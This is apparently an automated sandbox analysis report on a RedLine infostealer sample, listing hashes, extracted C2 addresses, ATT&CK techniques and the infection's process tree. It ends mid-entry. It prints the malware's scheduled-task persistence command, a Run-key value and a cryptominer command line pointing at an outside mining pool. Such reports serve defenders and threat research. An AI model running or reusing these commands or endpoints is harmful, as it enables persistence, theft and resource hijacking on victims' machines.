redline | 7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80

Analysis

max time kernel
94s
max time network
149s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
13-11-2022 11:27

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
Size

173KB
MD5

e26a8bd140d37bb6386844415c784ffc
SHA1

0afc9aa8faae9855761ca58b73d349571ad06e3c
SHA256

7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80
SHA512

38f00322a616dd90a8dc8896200f4ba33f042a2ac268ec9a2ba84c2e14bd2725b1e58fe27b110050db34193f05beebe1594828e14c73689dd5bc0bdd49aa43f7
SSDEEP

3072:iabcXU8LhrF75/zR+Jp0T26lv664/r2T9sKzh:pILhrF7lA0qAvD4z2T5

Score

10^/10

redline 123 google2 discovery evasion infostealer persistence spyware stealer themida trojan upx

Malware Config

Extracted

Family

redline

Botnet

123

78.153.144.3:2510

Attributes

auth_value
cd6abb0af211bce081d7bf127cc26835

Extracted

Family

redline

Botnet

Google2

167.235.71.14:20469

Attributes

auth_value
fb274d9691235ba015830da570a13578

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral1/memory/364-240-0x0000000002460000-0x000000000249E000-memory.dmp	family_redline
behavioral1/memory/364-248-0x0000000002510000-0x000000000254C000-memory.dmp	family_redline
behavioral1/memory/4060-900-0x0000000001340000-0x0000000001379000-memory.dmp	family_redline
behavioral1/memory/3868-906-0x00000000004221AE-mapping.dmp	family_redline
behavioral1/memory/3868-942-0x0000000000400000-0x0000000000428000-memory.dmp	family_redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

5A1A.exeBrowserUpdate.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	5A1A.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	BrowserUpdate.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

Processes:

2829.exe2F5E.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe38E4.exe3CCD.exeLYKAA.exe5A1A.exe6AD5.exe38E4.exeBrowser Update.exeBrowserUpdate.exe

pid	process
4060	2829.exe
3016	2F5E.exe
3852	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
800	38E4.exe
364	3CCD.exe
4800	LYKAA.exe
5096	5A1A.exe
588	6AD5.exe
3044	38E4.exe
2200	Browser Update.exe
3428	BrowserUpdate.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/1396-342-0x0000000000400000-0x0000000000BEB000-memory.dmp	upx
behavioral1/memory/1396-430-0x0000000000400000-0x0000000000BEB000-memory.dmp	upx

Checks BIOS information in registry 2 TTPs 4 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

5A1A.exeBrowserUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	5A1A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	5A1A.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	BrowserUpdate.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	BrowserUpdate.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

BrowserUpdate.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Control Panel\International\Geo\Nation	BrowserUpdate.exe

Deletes itself 1 IoCs

Processes:

pid process

3056
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
3056

Themida packer 9 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\5A1A.exe	themida
behavioral1/memory/5096-281-0x0000000000150000-0x00000000005E5000-memory.dmp	themida
C:\Users\Admin\AppData\Local\Temp\5A1A.exe	themida
behavioral1/memory/5096-534-0x0000000000150000-0x00000000005E5000-memory.dmp	themida
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	themida
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	themida
behavioral1/memory/3428-814-0x0000000000D40000-0x0000000001726000-memory.dmp	themida
behavioral1/memory/5096-827-0x0000000000150000-0x00000000005E5000-memory.dmp	themida
behavioral1/memory/3428-885-0x0000000000D40000-0x0000000001726000-memory.dmp	themida

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Browser Update.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	Browser Update.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google LLC = "C:\\Program Files\\Google\\Chrome\\Application\\BrowserUpdate.exe -l google.sup1@yahoo.com"	Browser Update.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

BrowserUpdate.exe5A1A.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	BrowserUpdate.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	5A1A.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 3 IoCs

Processes:

6AD5.exe38E4.exeLYKAA.exe

description	pid	process	target process
PID 588 set thread context of 1396	588	6AD5.exe	RegSvcs.exe
PID 800 set thread context of 3044	800	38E4.exe	38E4.exe
PID 4800 set thread context of 2540	4800	LYKAA.exe	vbc.exe

Drops file in Program Files directory 1 IoCs

Processes:

Browser Update.exe

description ioc process

File opened for modification C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe Browser Update.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

1316 3044 WerFault.exe 38E4.exe
2344 4060 WerFault.exe 2829.exe

description	ioc	process
File opened for modification	C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe	Browser Update.exe

pid	pid_target	process	target process
1316	3044	WerFault.exe	38E4.exe
2344	4060	WerFault.exe	2829.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4220 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4620 timeout.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 74 Go-http-client/1.1

pid	process
4220	schtasks.exe

pid	process
4620	timeout.exe

description	flow	ioc
HTTP User-Agent header	74	Go-http-client/1.1

Modifies registry class 3 IoCs

Processes:

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance
Key created	\REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe

pid	process
3064	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
3064	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

3056

pid	process
3056

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe

pid	process
3064	7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056
3056

Suspicious use of AdjustPrivilegeToken 43 IoCs

Processes:

EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe3CCD.exe

description	pid	process
Token: SeDebugPrivilege	3852	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
Token: SeDebugPrivilege	4800	LYKAA.exe
Token: SeDebugPrivilege	364	3CCD.exe
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056
Token: SeShutdownPrivilege	3056
Token: SeCreatePagefilePrivilege	3056

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

pid process

3056
3056

pid	process
3056
3056

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

Browser Update.exeBrowserUpdate.exe

pid	process
2200	Browser Update.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe
3428	BrowserUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2F5E.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.execmd.exeLYKAA.execmd.exe6AD5.exe38E4.exe5A1A.exe

description	pid	process	target process
PID 3056 wrote to memory of 4060	3056		2829.exe
PID 3056 wrote to memory of 4060	3056		2829.exe
PID 3056 wrote to memory of 4060	3056		2829.exe
PID 3056 wrote to memory of 3016	3056		2F5E.exe
PID 3056 wrote to memory of 3016	3056		2F5E.exe
PID 3016 wrote to memory of 3852	3016	2F5E.exe	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
PID 3016 wrote to memory of 3852	3016	2F5E.exe	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
PID 3852 wrote to memory of 4804	3852	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe	cmd.exe
PID 3852 wrote to memory of 4804	3852	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe	cmd.exe
PID 4804 wrote to memory of 4620	4804	cmd.exe	timeout.exe
PID 4804 wrote to memory of 4620	4804	cmd.exe	timeout.exe
PID 3056 wrote to memory of 800	3056		38E4.exe
PID 3056 wrote to memory of 800	3056		38E4.exe
PID 3056 wrote to memory of 364	3056		3CCD.exe
PID 3056 wrote to memory of 364	3056		3CCD.exe
PID 3056 wrote to memory of 364	3056		3CCD.exe
PID 4804 wrote to memory of 4800	4804	cmd.exe	LYKAA.exe
PID 4804 wrote to memory of 4800	4804	cmd.exe	LYKAA.exe
PID 4800 wrote to memory of 3792	4800	LYKAA.exe	cmd.exe
PID 4800 wrote to memory of 3792	4800	LYKAA.exe	cmd.exe
PID 3792 wrote to memory of 4220	3792	cmd.exe	schtasks.exe
PID 3792 wrote to memory of 4220	3792	cmd.exe	schtasks.exe
PID 3056 wrote to memory of 5096	3056		5A1A.exe
PID 3056 wrote to memory of 5096	3056		5A1A.exe
PID 3056 wrote to memory of 5096	3056		5A1A.exe
PID 3056 wrote to memory of 588	3056		6AD5.exe
PID 3056 wrote to memory of 588	3056		6AD5.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 588 wrote to memory of 1396	588	6AD5.exe	RegSvcs.exe
PID 3056 wrote to memory of 1320	3056		explorer.exe
PID 3056 wrote to memory of 1320	3056		explorer.exe
PID 3056 wrote to memory of 1320	3056		explorer.exe
PID 3056 wrote to memory of 1320	3056		explorer.exe
PID 3056 wrote to memory of 164	3056		explorer.exe
PID 3056 wrote to memory of 164	3056		explorer.exe
PID 3056 wrote to memory of 164	3056		explorer.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 800 wrote to memory of 3044	800	38E4.exe	38E4.exe
PID 3056 wrote to memory of 4756	3056		explorer.exe
PID 3056 wrote to memory of 4756	3056		explorer.exe
PID 3056 wrote to memory of 4756	3056		explorer.exe
PID 3056 wrote to memory of 4756	3056		explorer.exe
PID 5096 wrote to memory of 2200	5096	5A1A.exe	Browser Update.exe
PID 5096 wrote to memory of 2200	5096	5A1A.exe	Browser Update.exe

C:\Users\Admin\AppData\Local\Temp\7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe
"C:\Users\Admin\AppData\Local\Temp\7bedeb84856429c4bb0dab709cc46c879610d6f0976add2adbab07adddab4e80.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3064

C:\Users\Admin\AppData\Local\Temp\2829.exe
C:\Users\Admin\AppData\Local\Temp\2829.exe
1⤵
- Executes dropped EXE
PID:4060

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4060 -s 256
2⤵
- Program crash
PID:2344

C:\Users\Admin\AppData\Local\Temp\2F5E.exe
C:\Users\Admin\AppData\Local\Temp\2F5E.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3016

C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
"C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3852

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp349D.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:4804

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4620

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4800

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:3792

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
6⤵
- Creates scheduled task(s)
PID:4220

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
5⤵
PID:2540

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:3888

C:\Users\Admin\AppData\Local\Temp\38E4.exe
C:\Users\Admin\AppData\Local\Temp\38E4.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:800

C:\Users\Admin\AppData\Local\Temp\38E4.exe
"C:\Users\Admin\AppData\Local\Temp\38E4.exe"
2⤵
- Executes dropped EXE
PID:3044

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3044 -s 616
3⤵
- Program crash
PID:1316

C:\Users\Admin\AppData\Local\Temp\3CCD.exe
C:\Users\Admin\AppData\Local\Temp\3CCD.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:364

C:\Users\Admin\AppData\Local\Temp\5A1A.exe
C:\Users\Admin\AppData\Local\Temp\5A1A.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of WriteProcessMemory
PID:5096

C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe
"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Browser Update.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
PID:2200

C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
"C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe" -l google.sup1@yahoo.com
3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:3428

C:\Users\Admin\AppData\Local\Temp\6AD5.exe
C:\Users\Admin\AppData\Local\Temp\6AD5.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:588

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe
2⤵
PID:1396

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1320

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:164

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4756

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:2280

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4432

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3016

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4504

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4996

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:5044

C:\Users\Admin\AppData\Roaming\ijeebcv
C:\Users\Admin\AppData\Roaming\ijeebcv
1⤵
PID:4252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scripting

T1064

Scheduled Task

T1053

Persistence

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Virtualization/Sandbox Evasion

T1497

Scripting

T1064

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
Filesize
9.9MB

MD5
fa0733b9fea77460a5c006e384779577

SHA1
d34ad581d313b353c1f74209fcc8a659f236f79a

SHA256
b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd

SHA512
efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b

Download Submit
C:\Program Files\Google\Chrome\Application\BrowserUpdate.exe
Filesize
9.9MB

MD5
fa0733b9fea77460a5c006e384779577

SHA1
d34ad581d313b353c1f74209fcc8a659f236f79a

SHA256
b439153b2144bb1566c0454cf563d54d7bcd6983488555bdc170f0414f60d2bd

SHA512
efec566a345a318fff8cece6f41d7db29263b3ac0bd95b15603148ed9c02a4122821827eb1e0cbcc25335d9d37910c1da098a2f46bf2b78efea92d37e95b193b

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
Filesize
836KB

MD5
edb6463d39eb1305c07400d169a40eba

SHA1
456f4da4c204f7dd77af1834275213f663128e11

SHA256
b0319fee29612b6f40ee9a9368cc23273c233547d9b1aa3bb551f8b57496ceb9

SHA512
ab03697252ef332f4c8373bc47e3584302b58d3b314cecf9f9f39b3bbc7b1771080671185c4d29d57b1cfcc605afe70132ece7667d638a64096853e6d7c72306

Download Submit
C:\Users\Admin\AppData\Local\Temp\2829.exe
Filesize
218KB

MD5
1ec0348748a51f2f4046c606bbe51b86

SHA1
7b0d44663e0aba01af5d83792bf50999f80a61eb

SHA256
733bdd0f020cad521980d389dc459b330f895a5186fd0eec15d5dd3a773953f5

SHA512
50bac5afc813ebf9a690237c689c2d71bd30a099b3b1cf7f14a5ed5e109285cccf817c8fda2853b6b01ad8ee4009158fd672d6306ab409c1db9a1a1ef2559430

Download Submit
C:\Users\Admin\AppData\Local\Temp\2829.exe
Filesize
218KB

MD5
1ec0348748a51f2f4046c606bbe51b86

SHA1
7b0d44663e0aba01af5d83792bf50999f80a61eb

SHA256
733bdd0f020cad521980d389dc459b330f895a5186fd0eec15d5dd3a773953f5

SHA512
50bac5afc813ebf9a690237c689c2d71bd30a099b3b1cf7f14a5ed5e109285cccf817c8fda2853b6b01ad8ee4009158fd672d6306ab409c1db9a1a1ef2559430

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F5E.exe
Filesize
1.1MB

MD5
ae30203171ea1b8be4017efcab8dd23e

SHA1
597c1cbc27659181318bd9d4f44fcd55abc4e36e

SHA256
a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401

SHA512
b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\2F5E.exe
Filesize
1.1MB

MD5
ae30203171ea1b8be4017efcab8dd23e

SHA1
597c1cbc27659181318bd9d4f44fcd55abc4e36e

SHA256
a232ab45ccd355e5ba96a254edcc53deb2bcbf154610732b444cb5d6d07ce401

SHA512
b1a963f6b0953673145191540e22d9eee4039efccbb8bf153517ba63257a056000a15fd52edf4c6a2dd572cca5267d675a174694c694e408d9a006e4dc933f04

Download Submit
C:\Users\Admin\AppData\Local\Temp\38E4.exe
Filesize
110KB

MD5
8f5b12d2ebe6e2c29b1778a72963c59c

SHA1
bf3a68954935657f0089d712d48570e755783bfd

SHA256
0f0f69a705a280dac2f7476c1d3d267d5d3c238fee412dbeb14079beeeb40f29

SHA512
d50bc3b34e663655ebf3b139d400f919b0ae49be4f2e6a0f5ad647f1228a551072a89802f5c7fd078df124ffcd1145d92435638d76ce149fb125b0c6a7b64e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\38E4.exe
Filesize
110KB

MD5
8f5b12d2ebe6e2c29b1778a72963c59c

SHA1
bf3a68954935657f0089d712d48570e755783bfd

SHA256
0f0f69a705a280dac2f7476c1d3d267d5d3c238fee412dbeb14079beeeb40f29

SHA512
d50bc3b34e663655ebf3b139d400f919b0ae49be4f2e6a0f5ad647f1228a551072a89802f5c7fd078df124ffcd1145d92435638d76ce149fb125b0c6a7b64e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\38E4.exe
Filesize
110KB

MD5
8f5b12d2ebe6e2c29b1778a72963c59c

SHA1
bf3a68954935657f0089d712d48570e755783bfd

SHA256
0f0f69a705a280dac2f7476c1d3d267d5d3c238fee412dbeb14079beeeb40f29

SHA512
d50bc3b34e663655ebf3b139d400f919b0ae49be4f2e6a0f5ad647f1228a551072a89802f5c7fd078df124ffcd1145d92435638d76ce149fb125b0c6a7b64e00

Download Submit
C:\Users\Admin\AppData\Local\Temp\3CCD.exe
Filesize
330KB

MD5
1e3198f474fb810b5dc99c1a5c589033

SHA1
cbb28335092cf068f47b9d647bbbd8dd8332db10

SHA256
7a9fa95378a3e57fa51375c7bfa9d670a288f82d366f335328e9f92240be008f

SHA512
